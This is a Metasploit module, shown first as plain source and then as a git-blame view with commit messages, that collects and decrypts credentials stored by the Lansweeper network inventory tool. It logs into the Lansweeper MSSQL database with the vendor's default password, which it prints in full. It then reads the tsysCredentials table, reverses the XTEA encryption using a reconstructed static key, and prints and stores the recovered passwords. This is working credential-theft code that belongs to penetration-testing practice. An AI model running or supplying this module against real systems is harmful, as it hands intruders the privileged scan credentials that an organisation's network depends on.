metasploit-framework/modules/auxiliary/gather/lansweeper_collector.rb

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::MSSQL
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Lansweeper Credential Collector',
      'Description' => %q(
        Lansweeper stores the credentials it uses to scan the computers
        in its Microsoft SQL database.  The passwords are XTea-encrypted with a
        68 character long key, in which the first 8 characters are stored with
        the password in the database and the other 60 is static. Lansweeper, by
        default, creates an MSSQL user "lansweeperuser" with the password is
        "mysecretpassword0*", and stores its data in a database called
        "lansweeperdb". This module will query the MSSQL database for the
        credentials.
      ),
      'Author' =>
        [
          'sghctoma <tamas.szakaly[at]praudit.hu>', # Lansweeper RCE + Metasploit implementation
          'eq <balazs.bucsay[at]praudit.hu>', # Lansweeper RCE + discovering default credentials
          'calderpwn <calderon[at]websec.mx>' # Module for lansweeper (5.3.0.8)
        ],
      'License' => MSF_LICENSE,
      'DefaultOptions'  =>
        {
          'USERNAME' => 'lansweeperuser',
          'PASSWORD' => 'mysecretpassword0*'
        },
      'References' =>
        [
          ['URL', 'http://www.lansweeper.com'],
          ['URL', 'http://www.praudit.hu/prauditeng/index.php/blog/a-lansweeper-es-a-tea']
        ]))

    register_options([
      OptString.new('DATABASE', [true, 'The Lansweeper database', 'lansweeperdb'])
    ], self.class)

  end

  def uint32(n)
    n & 0xffffffff
  end

  def xtea_decode(v, k)
    sum = 0xc6ef3720
    v_0 = uint32(v[0])
    v_1 = uint32(v[1])

    0.upto(0x1f) do
      v_1 -= uint32((uint32(v_0 << 4) ^ uint32(v_0 >> 5)) + v_0) ^ uint32(sum + k[uint32(sum >> 11) & 3])
      v_1 = uint32(v_1)
      sum -= 0x9e3779b9
      sum = uint32(sum)
      v_0 -= (uint32(uint32(v_1 << 4) ^ uint32(v_1 >> 5)) + v_1) ^ uint32(sum + k[sum & 3])
      v_0 = uint32(v_0)
    end

    v[0] = v_0
    v[1] = v_1
  end

  def xtea_decrypt(data, key)
    k = key.ljust(16).unpack('VVVV')
    num = 0
    bytes = Array.new

    0.step(data.length - 1, 8) do |i|
      v = data[i, 8].unpack('VV')
      xtea_decode(v, k)
      bytes[num] = v[0]
      num += 1
      bytes[num] = v[1]
      num += 1
    end

    bytes.pack('c*')
  end

  def lsw_generate_pass
    key = ''

    (0..60).each do |num|
      key << [((40 - num) + ((num * 2) + num)) - 1].pack('c')
      key << [(num + 15) + num].pack('c')
    end

    key
  end

  def lsw_decrypt(data)
    data = Rex::Text.decode_base64(data)

    first = data[0]
    pass = data[1, 8]
    actual_data = data[9, data.length - 9]

    decrypted = xtea_decrypt(actual_data, pass + lsw_generate_pass)

    if first == '1'
      decrypted = decrypted[0, decrypted.length - 2]
    end

    Rex::Text.to_ascii(decrypted, 'utf-16le')
  end

  def report_cred(opts)
    service_data = {
      address: opts[:host],
      port: opts[:port],
      protocol: 'tcp',
      workspace_id: myworkspace.id,
      service_name: opts[:creds_name]
    }

    credential_data = {
      username: opts[:user],
      private_type: :password,
      private_data: opts[:password],
      origin_type: :service,
      module_fullname: self.fullname
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def run
    unless mssql_login_datastore
      fail_with(Failure::NoAccess, 'Login failed. Check credentials.')
    end
    result = mssql_query("select Credname, Username, Password from #{datastore['DATABASE']}.dbo.tsysCredentials WHERE LEN(Password)>64", false)

    result[:rows].each do |row|""
      pw = lsw_decrypt(row[2])

      print_good("Credential name: #{row[0]} | username: #{row[1]} | password: #{pw}")

      report_cred(
        :host => rhost,
        :port => rport,
        :creds_name => row[0],
        :user => row[1],
        :password => pw
      )
    end
    disconnect
  end
end
MSF module to download and decrypt credentials stored in Lansweeper's database 2015-06-26 00:29:30 +00:00			`require 'msf/core'`

			`class Metasploit3 < Msf::Auxiliary`
Fixes coding style issues 2015-06-26 08:29:17 +00:00			`include Msf::Exploit::Remote::MSSQL`
			`include Msf::Auxiliary::Report`

			`def initialize(info = {})`
			`super(update_info(info,`
Pre-Bloggery cleanup Edited modules/auxiliary/gather/lansweeper_collector.rb first landed in and minor description word choice changes. Edited modules/auxiliary/server/browser_autopwn2.rb first landed in options. Also removed from the description the missing options of 'WhiteList' and 'RealList' -- those don't appear to be available according to `show options` and `show advanced`, @wchen-r7. Edited modules/post/multi/recon/local_exploit_suggester.rb first landed in #5823, mv local_exploit_{suggestor,suggester} for minor description cleanup and axing the description of the SHOWDESCRIPTION option (it's already described identically on the option itself). 2015-08-13 17:33:04 +00:00			`'Name' => 'Lansweeper Credential Collector',`
Fix metadata 2015-08-04 21:28:50 +00:00			`'Description' => %q(`
Pre-Bloggery cleanup Edited modules/auxiliary/gather/lansweeper_collector.rb first landed in and minor description word choice changes. Edited modules/auxiliary/server/browser_autopwn2.rb first landed in options. Also removed from the description the missing options of 'WhiteList' and 'RealList' -- those don't appear to be available according to `show options` and `show advanced`, @wchen-r7. Edited modules/post/multi/recon/local_exploit_suggester.rb first landed in #5823, mv local_exploit_{suggestor,suggester} for minor description cleanup and axing the description of the SHOWDESCRIPTION option (it's already described identically on the option itself). 2015-08-13 17:33:04 +00:00			`Lansweeper stores the credentials it uses to scan the computers`
			`in its Microsoft SQL database. The passwords are XTea-encrypted with a`
			`68 character long key, in which the first 8 characters are stored with`
			`the password in the database and the other 60 is static. Lansweeper, by`
			`default, creates an MSSQL user "lansweeperuser" with the password is`
			`"mysecretpassword0*", and stores its data in a database called`
			`"lansweeperdb". This module will query the MSSQL database for the`
			`credentials.`
Fix metadata 2015-08-04 21:28:50 +00:00			`),`
			`'Author' =>`
			`[`
			`'sghctoma <tamas.szakaly[at]praudit.hu>', # Lansweeper RCE + Metasploit implementation`
			`'eq <balazs.bucsay[at]praudit.hu>', # Lansweeper RCE + discovering default credentials`
			`'calderpwn <calderon[at]websec.mx>' # Module for lansweeper (5.3.0.8)`
			`],`
			`'License' => MSF_LICENSE,`
			`'DefaultOptions' =>`
			`{`
			`'USERNAME' => 'lansweeperuser',`
			`'PASSWORD' => 'mysecretpassword0*'`
			`},`
			`'References' =>`
			`[`
			`['URL', 'http://www.lansweeper.com'],`
			`['URL', 'http://www.praudit.hu/prauditeng/index.php/blog/a-lansweeper-es-a-tea']`
			`]))`

			`register_options([`
			`OptString.new('DATABASE', [true, 'The Lansweeper database', 'lansweeperdb'])`
			`], self.class)`
Fixes coding style issues 2015-06-26 08:29:17 +00:00
			`end`

			`def uint32(n)`
			`n & 0xffffffff`
			`end`

Do some style fixes 2015-08-04 21:41:15 +00:00			`def xtea_decode(v, k)`
			`sum = 0xc6ef3720`
			`v_0 = uint32(v[0])`
			`v_1 = uint32(v[1])`
Fixes coding style issues 2015-06-26 08:29:17 +00:00
Stores credentials in DB, fixes loop variable and nil dereference bug 2015-06-28 00:06:15 +00:00			`0.upto(0x1f) do`
Do some style fixes 2015-08-04 21:41:15 +00:00			`v_1 -= uint32((uint32(v_0 << 4) ^ uint32(v_0 >> 5)) + v_0) ^ uint32(sum + k[uint32(sum >> 11) & 3])`
			`v_1 = uint32(v_1)`
			`sum -= 0x9e3779b9`
			`sum = uint32(sum)`
			`v_0 -= (uint32(uint32(v_1 << 4) ^ uint32(v_1 >> 5)) + v_1) ^ uint32(sum + k[sum & 3])`
			`v_0 = uint32(v_0)`
Fixes coding style issues 2015-06-26 08:29:17 +00:00			`end`
Do some style fixes 2015-08-04 21:41:15 +00:00
			`v[0] = v_0`
			`v[1] = v_1`
Fixes coding style issues 2015-06-26 08:29:17 +00:00			`end`

Do some style fixes 2015-08-04 21:41:15 +00:00			`def xtea_decrypt(data, key)`
Fixes coding style issues 2015-06-26 08:29:17 +00:00			`k = key.ljust(16).unpack('VVVV')`
			`num = 0`
			`bytes = Array.new`

			`0.step(data.length - 1, 8) do \|i\|`
			`v = data[i, 8].unpack('VV')`
Do some style fixes 2015-08-04 21:41:15 +00:00			`xtea_decode(v, k)`
Fixes coding style issues 2015-06-26 08:29:17 +00:00			`bytes[num] = v[0]`
			`num += 1`
			`bytes[num] = v[1]`
			`num += 1`
			`end`
Do some style fixes 2015-08-04 21:41:15 +00:00
Fixes coding style issues 2015-06-26 08:29:17 +00:00			`bytes.pack('c*')`
			`end`

Do some style fixes 2015-08-04 21:41:15 +00:00			`def lsw_generate_pass`
Fixes coding style issues 2015-06-26 08:29:17 +00:00			`key = ''`
Do some style fixes 2015-08-04 21:41:15 +00:00
			`(0..60).each do \|num\|`
Fixes coding style issues 2015-06-26 08:29:17 +00:00			`key << [((40 - num) + ((num * 2) + num)) - 1].pack('c')`
			`key << [(num + 15) + num].pack('c')`
			`end`
Do some style fixes 2015-08-04 21:41:15 +00:00
Fixes coding style issues 2015-06-26 08:29:17 +00:00			`key`
			`end`

Do some style fixes 2015-08-04 21:41:15 +00:00			`def lsw_decrypt(data)`
Fixes coding style issues 2015-06-26 08:29:17 +00:00			`data = Rex::Text.decode_base64(data)`

			`first = data[0]`
			`pass = data[1, 8]`
Do some style fixes 2015-08-04 21:41:15 +00:00			`actual_data = data[9, data.length - 9]`
Fixes coding style issues 2015-06-26 08:29:17 +00:00
Do some style fixes 2015-08-04 21:41:15 +00:00			`decrypted = xtea_decrypt(actual_data, pass + lsw_generate_pass)`
Fixes coding style issues 2015-06-26 08:29:17 +00:00
Do some style fixes 2015-08-04 21:41:15 +00:00			`if first == '1'`
Fixes coding style issues 2015-06-26 08:29:17 +00:00			`decrypted = decrypted[0, decrypted.length - 2]`
			`end`
Do some style fixes 2015-08-04 21:41:15 +00:00
Fixes coding style issues 2015-06-26 08:29:17 +00:00			`Rex::Text.to_ascii(decrypted, 'utf-16le')`
			`end`

Stores credentials using create_credential_login 2015-06-28 14:24:31 +00:00			`def report_cred(opts)`
			`service_data = {`
			`address: opts[:host],`
			`port: opts[:port],`
Fixes call to the credentials API and adds version info 2015-07-07 18:48:16 +00:00			`protocol: 'tcp',`
			`workspace_id: myworkspace.id,`
Do some style fixes 2015-08-04 21:41:15 +00:00			`service_name: opts[:creds_name]`
Stores credentials using create_credential_login 2015-06-28 14:24:31 +00:00			`}`
Do some style fixes 2015-08-04 21:41:15 +00:00
Stores credentials using create_credential_login 2015-06-28 14:24:31 +00:00			`credential_data = {`
Fixes typo 2015-06-28 14:32:16 +00:00			`username: opts[:user],`
Stores credentials using create_credential_login 2015-06-28 14:24:31 +00:00			`private_type: :password,`
			`private_data: opts[:password],`
Fixes call to the credentials API and adds version info 2015-07-07 18:48:16 +00:00			`origin_type: :service,`
Stores credentials using create_credential_login 2015-06-28 14:24:31 +00:00			`module_fullname: self.fullname`
			`}.merge(service_data)`
Do some style fixes 2015-08-04 21:41:15 +00:00
Stores credentials using create_credential_login 2015-06-28 14:24:31 +00:00			`login_data = {`
			`core: create_credential(credential_data),`
			`status: Metasploit::Model::Login::Status::UNTRIED`
			`}.merge(service_data)`

			`create_credential_login(login_data)`
			`end`

Fixes coding style issues 2015-06-26 08:29:17 +00:00			`def run`
Stores credentials in DB, fixes loop variable and nil dereference bug 2015-06-28 00:06:15 +00:00			`unless mssql_login_datastore`
Do some style fixes 2015-08-04 21:41:15 +00:00			`fail_with(Failure::NoAccess, 'Login failed. Check credentials.')`
Stores credentials in DB, fixes loop variable and nil dereference bug 2015-06-28 00:06:15 +00:00			`end`
Do some style fixes 2015-08-04 21:41:15 +00:00			`result = mssql_query("select Credname, Username, Password from #{datastore['DATABASE']}.dbo.tsysCredentials WHERE LEN(Password)>64", false)`

			`result[:rows].each do \|row\|""`
			`pw = lsw_decrypt(row[2])`

Stores credentials in DB, fixes loop variable and nil dereference bug 2015-06-28 00:06:15 +00:00			`print_good("Credential name: #{row[0]} \| username: #{row[1]} \| password: #{pw}")`
Do some style fixes 2015-08-04 21:41:15 +00:00
Stores credentials using create_credential_login 2015-06-28 14:24:31 +00:00			`report_cred(`
Stores credentials in DB, fixes loop variable and nil dereference bug 2015-06-28 00:06:15 +00:00			`:host => rhost,`
			`:port => rport,`
Stores credentials using create_credential_login 2015-06-28 14:24:31 +00:00			`:creds_name => row[0],`
Stores credentials in DB, fixes loop variable and nil dereference bug 2015-06-28 00:06:15 +00:00			`:user => row[1],`
Stores credentials using create_credential_login 2015-06-28 14:24:31 +00:00			`:password => pw`
Stores credentials in DB, fixes loop variable and nil dereference bug 2015-06-28 00:06:15 +00:00			`)`
Fixes coding style issues 2015-06-26 08:29:17 +00:00			`end`
			`disconnect`
			`end`
MSF module to download and decrypt credentials stored in Lansweeper's database 2015-06-26 00:29:30 +00:00			`end`